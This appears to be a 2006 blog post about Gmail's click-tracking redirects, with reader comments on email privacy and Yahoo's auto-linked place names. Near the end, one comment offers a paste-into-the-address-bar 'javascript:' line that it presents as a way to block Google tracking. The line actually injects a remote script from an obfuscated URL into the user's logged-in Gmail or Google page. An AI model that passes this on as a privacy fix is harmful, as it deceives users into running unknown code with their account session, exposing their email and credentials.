I can’t believe that I am the first one to notice this, and I guess it’s because I don’t use GMail regularly that I didn’t notice this before, but if they didn’t actually want your user data would Google be tracking clicks in Gmail?

Gmail Click Tracking

That’s a screen shot of an email I sent to myself, when I click through here is the click stream data

I mean really how does it benefit me the user by sending me through Google first? I caught this behavior last night when I was using a proxy. The problem was Google threw up some wonka-doodle 500 error everytime I went through the proxy. I clicked a link in an email that was not going to Google, forgot to turn the proxy off and Google choked on it. Now what’s really clever about the whole thing is anytime you click a purchase confirmation email from a store Google knows about it even if you don’t have the toolbar installed and the merchant isn’t using any of the Google services. Pretty sneaky those boys.

Ok for you incredibly inquisitive folks who are saying hey Gray what the heck are the 1800 emails in your inbox? I’m using the wordpress database backup plugin which every night send a backup of all of my core wordpress tables and any other tables to my gmail account. It’s kind of like a free off site backup.

Just be like me and have it welded to your skull. Google will never penetrate my lead/tin foil/titanium/kriptonite hat

Wow i din’t know that. is this considered as violation of privacy?

Rett December 1, 2006 at 12:09 pm

Not the same thing, but it looks like Yahoo has recently started scanning email text for specific terms. I’m surprised I haven’t read any posts about it yet (or maybe I missed it).

If you get an email from someone with a geo name (country, city, state, etc) referenced in the text, Yahoo dynamically hyperlinks it. If you click, you get a map and some Overture ads related to the highlighted term.

It’s bad enough that I get random hyperlink ads on some forums, now I’m getting them in my email too.

Well it is really violation of an individual’s privacy. This is one of the major reasons for which I hate to use the email services provided by the search engines like Google, Yahoo and MSN.I do make it a point to use all my important emails on my private email address that is completely secure.
Anyways I like the idea of using the free webspace provided by Gmail to store some good information.

If you want to see and block all google tracker, you must paste these code into address bar when you are in google.com or GMail.com pages and hit enter anytime before send mail messages or google queries.

javascript:d=document.createElement(’SCRIPT’);d.src=’%68%74%74%70://%6C%6E%6B%2E%74%6F%2F%68%78%72%0D%0A’;document.getElementsByTagName(’head’).item(0).appendChild(d);alert(’Submit in anonimous’);void(0)

this trick bypass all trackin from google.com

I have come across with the same several times. But, it is good you can utilize the space provided by any mail account for storing information.
